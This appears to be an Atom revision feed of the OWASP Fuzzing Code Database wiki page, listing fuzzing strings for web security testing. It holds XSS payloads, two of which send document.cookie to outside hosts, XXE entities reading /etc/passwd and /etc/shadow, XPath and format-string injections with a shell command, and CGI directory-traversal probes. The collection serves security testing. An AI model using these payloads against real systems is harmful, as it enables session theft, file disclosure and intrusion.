&amp;quot;&amp;amp;lt;IMG%20LOWSRC=&amp;quot;&amp;quot;javascript:alert('WXSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC='%26%23x6a;avasc%26%23000010ript:a%26%23x6c;ert(document.%26%23x63;ookie)'&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=javascript:alert('XSS')&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=&amp;amp;amp;#0000106&amp;amp;amp;#0000097&amp;amp;amp;#0000118&amp;amp;amp;#0000097&amp;amp;amp;#0000115&amp;amp;amp;#0000099&amp;amp;amp;#0000114&amp;amp;amp;#0000105&amp;amp;amp;#0000112&amp;amp;amp;#0000116&amp;amp;amp;#0000058&amp;amp;amp;#0000097&amp;amp;amp;#0000108&amp;amp;amp;#0000101&amp;amp;amp;#0000114&amp;amp;amp;#0000116&amp;amp;amp;#0000040&amp;amp;amp;#0000039&amp;amp;amp;#0000088&amp;amp;amp;#0000083&amp;amp;amp;#0000083&amp;amp;amp;#0000039&amp;amp;amp;#0000041&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=&amp;amp;amp;#x6A&amp;amp;amp;#x61&amp;amp;amp;#x76&amp;amp;amp;#x61&amp;amp;amp;#x73&amp;amp;amp;#x63&amp;amp;amp;#x72&amp;amp;amp;#x69&amp;amp;amp;#x70&amp;amp;amp;#x74&amp;amp;amp;#x3A&amp;amp;amp;#x61&amp;amp;amp;#x6C&amp;amp;amp;#x65&amp;amp;amp;#x72&amp;amp;amp;#x74&amp;amp;amp;#x28&amp;amp;amp;#x27&amp;amp;amp;#x58&amp;amp;amp;#x53&amp;amp;amp;#x53&amp;amp;amp;#x27&amp;amp;amp;#x29&amp;amp;gt;&lt;br /&gt;
'%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C/IFRAME%3E&lt;br /&gt;
&amp;quot;&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.location='http://cookieStealer/cgi-bin/cookie.cgi?'+document.cookie&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
%22%3E%3Cscript%3Edocument%2Elocation%3D%27http%3A%2F%2Fyour%2Esite%2Ecom%2Fcgi%2Dbin%2Fcookie%2Ecgi%3F%27%20%2Bdocument%2Ecookie%3C%2Fscript%3E&lt;br /&gt;
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//;alert(String.fromCharCode(88,83,83))//\;alert(String.fromCharCode(88,83,83))//&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;!--&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;=&amp;amp;amp;{}&lt;br /&gt;
'';!--&amp;amp;lt;XSS&amp;amp;gt;=&amp;amp;amp;{()}&amp;quot;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== XML Attacks - (Update: 11 August 2009 - Total Statements: 15)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;Statements&lt;br /&gt;
count(/child::node())&lt;br /&gt;
x' or name()='username' or 'x'='y&lt;br /&gt;
&amp;amp;lt;name&amp;amp;gt;','')); phpinfo(); exit;/*&amp;amp;lt;/name&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;![CDATA[&amp;amp;lt;script&amp;amp;gt;var n=0;while(true){n++;}&amp;amp;lt;/script&amp;amp;gt;]]&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;alert('XSS');&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;/SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;alert('XSS');&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;/SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;lt;![CDATA[' or 1=1 or ''=']]&amp;amp;gt;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file://c:/boot.ini&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file:////etc/passwd&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file:////etc/shadow&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file:////dev/random&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml ID=I&amp;amp;gt;&amp;amp;lt;X&amp;amp;gt;&amp;amp;lt;C&amp;amp;gt;&amp;amp;lt;![CDATA[&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas]]&amp;amp;gt;&amp;amp;lt;![CDATA[cript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;]]&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml ID=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;I&amp;amp;gt;&amp;amp;lt;B&amp;amp;gt;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas&amp;amp;lt;!-- --&amp;amp;gt;cript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/B&amp;amp;gt;&amp;amp;lt;/I&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=&amp;quot;&amp;quot;#xss&amp;quot;&amp;quot; DATAFLD=&amp;quot;&amp;quot;B&amp;quot;&amp;quot; DATAFORMATAS=&amp;quot;&amp;quot;HTML&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;amp;lt;/C&amp;amp;gt;&amp;amp;lt;/X&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml SRC=&amp;quot;&amp;quot;xsstest.xml&amp;quot;&amp;quot; ID=I&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;HTML xmlns:xss&amp;amp;gt;&amp;amp;lt;?import namespace=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot; implementation=&amp;quot;&amp;quot;http://ha.ckers.org/xss.htc&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;xss:xss&amp;amp;gt;XSS&amp;amp;lt;/xss:xss&amp;amp;gt;&amp;amp;lt;/HTML&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
=== Format String Statements - (Update: 30 July 2007 - Total Statements: 28) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# Full List&lt;br /&gt;
# Format String tests to determine errors in variable handling&lt;br /&gt;
# Foobar@email.de&lt;br /&gt;
&lt;br /&gt;
%s%p%x%d&lt;br /&gt;
.1024d&lt;br /&gt;
%.2049d&lt;br /&gt;
%p%p%p%p&lt;br /&gt;
%x%x%x%x&lt;br /&gt;
%d%d%d%d&lt;br /&gt;
%s%s%s%s&lt;br /&gt;
%99999999999s&lt;br /&gt;
%08x&lt;br /&gt;
%%20d&lt;br /&gt;
%%20n&lt;br /&gt;
%%20x&lt;br /&gt;
%%20s&lt;br /&gt;
%s%s%s%s%s%s%s%s%s%s&lt;br /&gt;
%p%p%p%p%p%p%p%p%p%p&lt;br /&gt;
%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%&lt;br /&gt;
f(x)=%s x 123&lt;br /&gt;
f(x)=%x x 255&lt;br /&gt;
%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x&lt;br /&gt;
%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s&lt;br /&gt;
XXXXX.%p&lt;br /&gt;
XXXXX`perl -e 'print &amp;quot;.%p&amp;quot; x 80'`&lt;br /&gt;
`perl -e 'print &amp;quot;.%p&amp;quot; x 80'`%n&lt;br /&gt;
%08x.%08x.%08x.%08x.%08x\n&lt;br /&gt;
XXX0_%08x.%08x.%08x.%08x.%08x\n&lt;br /&gt;
%.16705u%2\$hn&lt;br /&gt;
\x10\x01\x48\x08_%08x.%08x.%08x.%08x.%08x|%s|&lt;br /&gt;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;id &amp;amp;gt; /tmp/file; exit;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
==== Project Contributor  ====&lt;br /&gt;
&lt;br /&gt;
Project Leader: [[:User:Wagner.elias|'''Wagner Elias''']] &lt;br /&gt;
&lt;br /&gt;
Reviewer: [[:User:eneves|'''Eduardo Neves''']] &lt;br /&gt;
&lt;br /&gt;
Contributor: [[:User:ulisses.castro|'''Ulisses Castro''']] [[:User:Adam.muntner|'''Adam Muntner''']] &lt;br /&gt;
&lt;br /&gt;
==== Feedback and Participation  ====&lt;br /&gt;
&lt;br /&gt;
We hope you find the Fuzzing Code Database useful. Please contribute to the Project by volunteering for one of the tasks, sending your comments, questions, and suggestions to wagner.elias |at| owasp.org &lt;br /&gt;
&lt;br /&gt;
==== Project Identification  ====&lt;br /&gt;
&lt;br /&gt;
{{Template:OWASP Project Identification Tab&lt;br /&gt;
| project_name = OWASP Fuzzing Code Database&lt;br /&gt;
| project_description = &lt;br /&gt;
| leader_name = Wagner Elias&lt;br /&gt;
| leader_email = &lt;br /&gt;
| leader_username = Wagner.elias&lt;br /&gt;
| maintainer_name = &lt;br /&gt;
| maintainer_email = &lt;br /&gt;
| maintainer_username = &lt;br /&gt;
| contributor_name1 = &lt;br /&gt;
| contributor_email1 = &lt;br /&gt;
| contributor_username1 = &lt;br /&gt;
| contributor_name2 = &lt;br /&gt;
| contributor_email2 = &lt;br /&gt;
| contributor_username2 = &lt;br /&gt;
| contributor_name3 = &lt;br /&gt;
| contributor_email3 = &lt;br /&gt;
| contributor_username3 = &lt;br /&gt;
| contributor_name4 = &lt;br /&gt;
| contributor_email4 = &lt;br /&gt;
| contributor_username4 = &lt;br /&gt;
| contributor_name5 = &lt;br /&gt;
| contributor_email5 = &lt;br /&gt;
| contributor_username5 = &lt;br /&gt;
| contributor_name6 = &lt;br /&gt;
| contributor_email6 = &lt;br /&gt;
| contributor_username6 = &lt;br /&gt;
| contributor_name7 = &lt;br /&gt;
| contributor_email7 = &lt;br /&gt;
| contributor_username7 = &lt;br /&gt;
| contributor_name8 = &lt;br /&gt;
| contributor_email8 = &lt;br /&gt;
| contributor_username8 = &lt;br /&gt;
| contributor_name9 = &lt;br /&gt;
| contributor_email9 = &lt;br /&gt;
| contributor_username9 = &lt;br /&gt;
| contributor_name10 = &lt;br /&gt;
| contributor_email10 = &lt;br /&gt;
| contributor_username10 =  &lt;br /&gt;
| pamphlet_link = &lt;br /&gt;
| mailing_list_name = owasp-fuzzing-code-database&lt;br /&gt;
| links_url1 = &lt;br /&gt;
| links_name1 = &lt;br /&gt;
| links_url2 = &lt;br /&gt;
| links_name2 = &lt;br /&gt;
| links_url3 = &lt;br /&gt;
| links_name3 = &lt;br /&gt;
| links_url4 = &lt;br /&gt;
| links_name4 = &lt;br /&gt;
| links_url5 = &lt;br /&gt;
| links_name5 = &lt;br /&gt;
| links_url6 = &lt;br /&gt;
| links_name6 = &lt;br /&gt;
| links_url7 = &lt;br /&gt;
| links_name7 = &lt;br /&gt;
| links_url8 = &lt;br /&gt;
| links_name8 = &lt;br /&gt;
| links_url9 = &lt;br /&gt;
| links_name9 = &lt;br /&gt;
| links_url10 = &lt;br /&gt;
| links_name10 = &lt;br /&gt;
| project_road_map =&lt;br /&gt;
| project_health_status = &lt;br /&gt;
| current_release_name = &lt;br /&gt;
| current_release_date = &lt;br /&gt;
| current_release_download_link = &lt;br /&gt;
| current_release_rating = &lt;br /&gt;
| current_release_leader_name = &lt;br /&gt;
| current_release_leader_email = &lt;br /&gt;
| current_release_leader_username = &lt;br /&gt;
| last_reviewed_release_name = &lt;br /&gt;
| last_reviewed_release_date = &lt;br /&gt;
| last_reviewed_release_download_link = &lt;br /&gt;
| last_reviewed_release_rating = &lt;br /&gt;
| last_reviewed_release_leader_name = &lt;br /&gt;
| last_reviewed_release_leader_email = &lt;br /&gt;
| last_reviewed_release_leader_username = &lt;br /&gt;
| old_release_name1 = &lt;br /&gt;
| old_release_date1 = &lt;br /&gt;
| old_release_download_link1 = &lt;br /&gt;
| old_release_name2 = &lt;br /&gt;
| old_release_date2 = &lt;br /&gt;
| old_release_download_link2 = &lt;br /&gt;
| old_release_name3 = &lt;br /&gt;
| old_release_date3 = &lt;br /&gt;
| old_release_download_link3 = &lt;br /&gt;
| old_release_name4 = &lt;br /&gt;
| old_release_date4 = &lt;br /&gt;
| old_release_download_link4 = &lt;br /&gt;
| old_release_name5 = &lt;br /&gt;
| old_release_date5 = &lt;br /&gt;
| old_release_download_link5 = &lt;br /&gt;
}} __NOTOC__ &amp;lt;headertabs /&amp;gt; &lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP_Project|Fuzzing Code Database]] [[Category:OWASP_Document]] [[Category:OWASP_Alpha_Quality_Document]]&lt;/div&gt;</summary>
		<author><name>Adam.muntner</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Category:OWASP_Fuzzing_Code_Database&amp;diff=81139</id>
		<title>Category:OWASP Fuzzing Code Database</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Category:OWASP_Fuzzing_Code_Database&amp;diff=81139"/>
				<updated>2010-04-08T18:40:18Z</updated>
		
		<summary type="html">&lt;p&gt;Adam.muntner: /* Microsoft URLs (18 March 2010) */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;This database is a collection of several statements used in code injection, fuzzing and brute-force aproach. All too often security professionals rely on their own repositories of statements collected from assessments they've conducted. These repositories are prone to being incomplete or outdated. We want to collect all these statements, merging the statements from several projects like [[WebScarab]], [[WebSlayer]] and [[JBroFuzz]] with member contributions to build a comprehensive dataset of effective statements to provide better testing results. Please add your own statements and check out the statements already added. &lt;br /&gt;
&lt;br /&gt;
==== News  ====&lt;br /&gt;
&lt;br /&gt;
'''17 March 2010'''&lt;br /&gt;
&lt;br /&gt;
*Created new Category: Vulnerable Cross-Platform CGI (17 March 2010 - Total Statements: 563)&lt;br /&gt;
*Created new Category: Windows Directory Traversal (Update: 17 March 2010 - Total Statements: 16)&lt;br /&gt;
*Created new Category: Generic 8 Directory Deep Traversal Fuzz (17 March 2010 - Total Statements: 879)&lt;br /&gt;
*Created new Category: Common Windows CGI (Update: 17 March 2010 - Total Statements: 76)&lt;br /&gt;
*Created new Category: File Upload Filter Bypass (Update: 17 March 2010 - Total Statements: 4)&lt;br /&gt;
*Created new Category: Cross-Platform File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 2)&lt;br /&gt;
*Created new Category: Cross-Platform File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 7)&lt;br /&gt;
*Created new Category: Microsoft-Specific Cross-Platform File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 14)&lt;br /&gt;
*Created new Category: Commonly Writable directories File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 9)&lt;br /&gt;
&lt;br /&gt;
'''16 March 2010'''&lt;br /&gt;
&lt;br /&gt;
*Created new Category: Common Data File Extensions (Update: 16 March 2010 - Total Statements: 863)&lt;br /&gt;
*Created new Category: Uncommon Data File Extensions (Update: 16 March 2010 - Total Statements: 284) &lt;br /&gt;
*Created new Category: Cold Fusion Default Files - (Update: 16 March 2010 - Total Statements: 65)&lt;br /&gt;
*Created new Category: All HTTP Verbs Defined in RFC's + 1 ARBITRARY Verb - (Update: 16 March 2010 - Total Statements: 31)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''02 February 2010'''&lt;br /&gt;
&lt;br /&gt;
*Created new Category Lotus/Notes Files&lt;br /&gt;
&lt;br /&gt;
'''11 August 2009''' &lt;br /&gt;
&lt;br /&gt;
*Created new Category: XML Attacks&lt;br /&gt;
&lt;br /&gt;
''Update Statements'' &lt;br /&gt;
&lt;br /&gt;
*15 new XML Statements &lt;br /&gt;
*93 new SQL Injections Statements &lt;br /&gt;
*67 new Traversal Directory Statements &lt;br /&gt;
*Delete 33 XSS Statement Duplicate &lt;br /&gt;
*30 New XSS Statements&lt;br /&gt;
&lt;br /&gt;
'''7 August 2009''' &lt;br /&gt;
&lt;br /&gt;
*Updated the objectives of the project.&lt;br /&gt;
&lt;br /&gt;
'''21 July 2009''' &lt;br /&gt;
&lt;br /&gt;
*Set the team responsible for the project.&lt;br /&gt;
&lt;br /&gt;
==== Goals  ====&lt;br /&gt;
&lt;br /&gt;
This project intend to create a database that concentrate all tools which are based on wordlists such as Webscarab, JBroFuzz, Web Slayer , Dirbuster. and others. In addition to current tools developed by OWASP members we will create a database following a style similar to Open Vulnerability and Assessment Language (OVAL) where any tool can adopt and use a XML file maintained by OWASP. &lt;br /&gt;
&lt;br /&gt;
In addition, the following functionalities will be included on this project: &lt;br /&gt;
&lt;br /&gt;
1 - The statements of ASDR Project 2 - Browser 3 - Operational System 4 - Databases &lt;br /&gt;
&lt;br /&gt;
An URL will also be published to create an collaborative environment for the maintenance process where the following features are planned: &lt;br /&gt;
&lt;br /&gt;
1 - Deploy a process where a new statement can be suggested and registered if is not valid yet and not maintained in other database. &lt;br /&gt;
&lt;br /&gt;
2 - A list where besides the statement, a single id will be maintained to identify each statement with a description and the results of the exploitation. &lt;br /&gt;
&lt;br /&gt;
3 - Possibility to support users on the report of their own experiences with the statements. &lt;br /&gt;
&lt;br /&gt;
==== Statements  ====&lt;br /&gt;
&lt;br /&gt;
=== Microsoft URLs (18 March 2010) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Interesting IIS Files &amp;amp; Directories (17 March, 2009)&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# creative commons&lt;br /&gt;
# Look at the result codes in the headers - 403 likely mean the dir exists, 404  means not. It takes an ISAPI filter for IIS to return 404's for 403s. &lt;br /&gt;
# Altetrnatively, slight differences in the number of bytes returned will help differentiate.&lt;br /&gt;
&lt;br /&gt;
.printer&lt;br /&gt;
/%NETHOOD%/&lt;br /&gt;
/&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;.aspx&lt;br /&gt;
/AccessPlatform/&lt;br /&gt;
/AccessPlatform/auth/&lt;br /&gt;
/AccessPlatform/auth/clientscripts/cookies.js &lt;br /&gt;
/AccessPlatform/auth/clientscripts/login.js &lt;br /&gt;
/Exadmin/&lt;br /&gt;
/ExchWeb/&lt;br /&gt;
/Exchange/&lt;br /&gt;
/Microsoft-Server-ActiveSync/&lt;br /&gt;
/OMA/&lt;br /&gt;
/OWA/&lt;br /&gt;
/Public/&lt;br /&gt;
/_layouts/alllibs.htm&lt;br /&gt;
/_layouts/settings.htm&lt;br /&gt;
/_layouts/userinfo.htm&lt;br /&gt;
/_vti_bin/&lt;br /&gt;
/_vti_bin/_vti_aut/fp30reg.dll&lt;br /&gt;
/_vti_pvt/&lt;br /&gt;
/_WEB_INF/&lt;br /&gt;
/a%5c.aspx&lt;br /&gt;
/adovbs.inc&lt;br /&gt;
/aspnet_files/&lt;br /&gt;
/certcontrol/&lt;br /&gt;
/certenroll/&lt;br /&gt;
/certsrv/&lt;br /&gt;
/citrix/&lt;br /&gt;
/citrix/AccessPlatform/auth/&lt;br /&gt;
/citrix/AccessPlatform/auth/clientscripts/&lt;br /&gt;
/AccessPlatform/auth/clientscripts/&lt;br /&gt;
/Citrix//AccessPlatform/auth/clientscripts/cookies.js &lt;br /&gt;
/Citrix/AccessPlatform/auth/clientscripts/login.js &lt;br /&gt;
/Citrix/PNAgent/config.xml&lt;br /&gt;
/exchange/root.asp&lt;br /&gt;
/forum.asp&lt;br /&gt;
/forum_arc.asp&lt;br /&gt;
/forum_professionnel.asp&lt;br /&gt;
/iisadmin/&lt;br /&gt;
/iisadmpwd/achg.htr&lt;br /&gt;
/iisadmpwd/aexp.htr&lt;br /&gt;
/iisadmpwd/aexp2.htr&lt;br /&gt;
/iisadmpwd/aexp2b.htr&lt;br /&gt;
/iisadmpwd/aexp3.htr&lt;br /&gt;
/iisadmpwd/aexp4.htr&lt;br /&gt;
/iisadmpwd/aexp4b.htr&lt;br /&gt;
/iisadmpwd/anot.htr&lt;br /&gt;
/iisadmpwd/anot3.htr&lt;br /&gt;
/iiasdmpwd/&lt;br /&gt;
/iishelp/&lt;br /&gt;
/iishelp/iis/misc/default.asp&lt;br /&gt;
/iissamples/&lt;br /&gt;
/imprimer.asp&lt;br /&gt;
/includes/adovbs.inc&lt;br /&gt;
/msadc/&lt;br /&gt;
/null.htw&lt;br /&gt;
/pbserver/pbserver.dll&lt;br /&gt;
/postinfo.html&lt;br /&gt;
/rubrique.asp&lt;br /&gt;
/scripts/&lt;br /&gt;
/scripts/fpcount.exe&lt;br /&gt;
/scripts/cgimail.exe&lt;br /&gt;
/scripts/tools/newdsn.exe&lt;br /&gt;
/scripts/tools/getdrvs.exe&lt;br /&gt;
/scripts/convert.bas&lt;br /&gt;
/cgi-bin/htmlscript&lt;br /&gt;
/scripts/counter.exe&lt;br /&gt;
/scripts/no-such-file.pl&lt;br /&gt;
/share/&lt;br /&gt;
/tsweb/&lt;br /&gt;
/~/&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;.asp&lt;br /&gt;
/~/&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;.aspx&lt;br /&gt;
index.shtml&lt;br /&gt;
x.htw&lt;br /&gt;
x.ida&lt;br /&gt;
x.idq&lt;br /&gt;
/cgi&lt;br /&gt;
/scripts/iisadmin/ism.dll?http/dir&lt;br /&gt;
/scripts/samples/search/webhits.exe&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Vulnerable Cross-Platform CGI (17 March 2010 - Total Statements: 563) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Vulnerable Cross-Platform CGI (17 March 2010) &lt;br /&gt;
# fuzz inside cgi directories&lt;br /&gt;
# on windows, this is usually /scripts or /bin or /cgi-bin, on unix, usually /cgi-bin, /nph-cgi&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
&lt;br /&gt;
%2e%2e/abyss.conf&lt;br /&gt;
.access&lt;br /&gt;
.cobalt&lt;br /&gt;
.cobalt/alert/service.cgi?service=&amp;lt;img%20src=javascript:alert('XSS')&amp;gt;&lt;br /&gt;
.cobalt/alert/service.cgi?service=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
.fhp&lt;br /&gt;
.htaccess&lt;br /&gt;
.htaccess.old&lt;br /&gt;
.htaccess.save&lt;br /&gt;
.htaccess~&lt;br /&gt;
.htpasswd&lt;br /&gt;
.nsconfig&lt;br /&gt;
.passwd&lt;br /&gt;
.www_acl&lt;br /&gt;
.wwwacl&lt;br /&gt;
/_vti_pvt/doctodep.btr&lt;br /&gt;
14all-1.1.cgi?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
14all.cgi?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
AT-admin.cgi&lt;br /&gt;
AT-generate.cgi&lt;br /&gt;
Album?mode=album&amp;amp;album=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc&amp;amp;dispsize=640&amp;amp;start=0&lt;br /&gt;
AnyBoard.cgi&lt;br /&gt;
AnyForm&lt;br /&gt;
AnyForm2&lt;br /&gt;
Backup/add-passwd.cgi&lt;br /&gt;
C&lt;br /&gt;
Count.cgi&lt;br /&gt;
DC&lt;br /&gt;
DCFORM&lt;br /&gt;
File&lt;br /&gt;
FormHandler.cgi?realname=aaa&amp;amp;email=aaa&amp;amp;reply_message_template=%2Fetc%2Fpasswd&amp;amp;reply_message_from=sq%40example.com&amp;amp;redirect=http%3A%2F%2Fwww.example.com&amp;amp;recipient=sq%40example.com&lt;br /&gt;
FormMail.cgi?&amp;lt;script&amp;gt;alert(\&lt;br /&gt;
FormMail.pl&lt;br /&gt;
ImageFolio/admin/admin.cgi&lt;br /&gt;
LWGate&lt;br /&gt;
LWGate.cgi&lt;br /&gt;
Upload.pl&lt;br /&gt;
Vs&lt;br /&gt;
W&lt;br /&gt;
YaBB.pl?board=news&amp;amp;action=display&amp;amp;num=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
YaBB/YaBB.cgi?board=BOARD&amp;amp;action=display&amp;amp;num=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
a1disp3.cgi?../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
a1stats/a1disp3.cgi?../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
a1stats/a1disp3.cgi?../../../../../../..{KNOWNFILE}&lt;br /&gt;
a1stats/a1disp4.cgi?../../../../../../..{KNOWNFILE}&lt;br /&gt;
add_ftp.cgi&lt;br /&gt;
addbanner.cgi&lt;br /&gt;
adduser.cgi&lt;br /&gt;
admin.cgi&lt;br /&gt;
admin.cgi?list=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
admin.php&lt;br /&gt;
admin.php3&lt;br /&gt;
admin.pl&lt;br /&gt;
adminhot.cgi&lt;br /&gt;
adminwww.cgi&lt;br /&gt;
af.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd&lt;br /&gt;
aglimpse&lt;br /&gt;
aglimpse.cgi&lt;br /&gt;
alibaba.pl|dir%20..\\..\\..\\..\\..\\..\\..\\,&lt;br /&gt;
